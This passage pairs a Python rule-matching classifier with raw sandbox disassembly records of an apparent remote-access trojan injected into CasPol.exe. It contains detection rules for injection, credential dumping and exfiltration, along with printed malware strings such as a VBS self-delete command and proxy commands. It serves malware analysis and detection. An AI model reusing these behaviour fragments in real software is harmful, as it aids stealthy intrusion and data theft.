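            cur.calls.append((m["api"], m["mod"], args, m["ref"], m["sub"]))
            cur.strings.update(args)
            continue
        m = STRINGS_RE.match(line)
        if m:
            cur.strings.update(t for t in m["s"].split("$") if t)
    return records


@dataclass(frozen=True)
class Rule:
    name: str
    all_apis: frozenset = frozenset()     # every listed API must be called
    any_strings: frozenset = frozenset()  # at least one substring must appear

    def matches(self, rec):
        if not self.all_apis <= rec.apis:
            return False
        return not self.any_strings or any(
            needle in s for needle in self.any_strings for s in rec.strings)


NTDLL_PRIMS = frozenset({"NtAllocateVirtualMemory", "NtFreeVirtualMemory",
                         "RtlAcquirePebLock", "LdrEnumerateLoadedModules"})
RULES = [
    Rule("manual ntdll resolution (injection primitives)",
         frozenset({"GetModuleHandleW", "GetProcAddress"}), NTDLL_PRIMS),
    Rule("self-copy install and relaunch",
         frozenset({"CopyFileW", "SetFileAttributesW", "ShellExecuteW", "ExitProcess"})),
    Rule("password-recovery tool run with /stext, output deleted",
         frozenset({"Sleep", "DeleteFileW"}), frozenset({"/stext"})),
    Rule("installed-software recon via Uninstall key",
         frozenset({"RegOpenKeyExA", "RegEnumKeyExA"}),
         frozenset({r"Software\Microsoft\Windows\CurrentVersion\Uninstall"})),
    Rule("socket send (exfil candidate)", frozenset({"send"})),
]


def classify(text):
    """List of matched rule names for each record in `text`, in record order."""
    return [[r.name for r in RULES if r.matches(rec)] for rec in parse_records(text)]


# Sample input copied from the records above, trimmed to the calls the rules use.
SAMPLE = r"""
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• String ID: /stext "$HDG$HDG$>G$>G
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
• RegCloseKey.ADVAPI32(?), ref: 0041BB54
"""

if __name__ == "__main__":
    for i, names in enumerate(classify(SAMPLE)):
        print(f"record {i}: {names or ['no rule matched']}")
```

Subcall entries are kept as ordinary calls with their `subcall_of` address retained, so a rule can still see the send() that only happens inside a callee; the trade-off is that a rule keyed on a common helper will fire on every caller of that helper, which is why the rules above pair APIs with the distinctive strings.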
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
• __aulldiv.LIBCMT ref: 00407FE9
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
• CloseHandle.KERNEL32(00000000), ref: 00408200
• CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
• CloseHandle.KERNEL32(00000000), ref: 00408256
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
• API String ID: 1884690901-3066803209
                                                                                                            • Opcode ID: 88ea97f44c53fbd348cf9e53321a401212c3e6164c9f36926d15b5b173278924
                                                                                                            • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                            • Opcode Fuzzy Hash: 88ea97f44c53fbd348cf9e53321a401212c3e6164c9f36926d15b5b173278924
                                                                                                            • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                                            • _free.LIBCMT ref: 00450136
                                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                                            • _free.LIBCMT ref: 00450175
                                                                                                            • _free.LIBCMT ref: 00450192
                                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                            • API String ID: 489098229-65789007
                                                                                                            • Opcode ID: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                            • Opcode Fuzzy Hash: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                            • API String ID: 1913171305-390638927
                                                                                                            • Opcode ID: 55bb4ee7066f8aebb67eba3c7e5c5b5a3aff5d198cab0c6ae93ac72ca68ce97f
                                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                            • Opcode Fuzzy Hash: 55bb4ee7066f8aebb67eba3c7e5c5b5a3aff5d198cab0c6ae93ac72ca68ce97f
                                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                            • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3658366068-0
                                                                                                            • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                            • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                            APIs
                                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                            • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 65535$udp
                                                                                                            • API String ID: 0-1267037602
                                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                                            • _free.LIBCMT ref: 00439471
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2441525078-0
                                                                                                            • Opcode ID: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                            • Opcode Fuzzy Hash: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                            • API String ID: 2956720200-749203953
                                                                                                            • Opcode ID: 6e6cf4c50a1e278e241bc0e389e802a651f2bd59b645ece987ca2d7b43a5be71
                                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                            • Opcode Fuzzy Hash: 6e6cf4c50a1e278e241bc0e389e802a651f2bd59b645ece987ca2d7b43a5be71
                                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                            • Opcode ID: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                            • Opcode Fuzzy Hash: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess
                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Eventinet_ntoa
                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                            • Opcode ID: d5e75b1e175cc3013bdfcc18363249725d57978ff08be7b442eff6e5afbf081f
                                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                            • Opcode Fuzzy Hash: d5e75b1e175cc3013bdfcc18363249725d57978ff08be7b442eff6e5afbf081f
                                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                            APIs
                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                            Strings
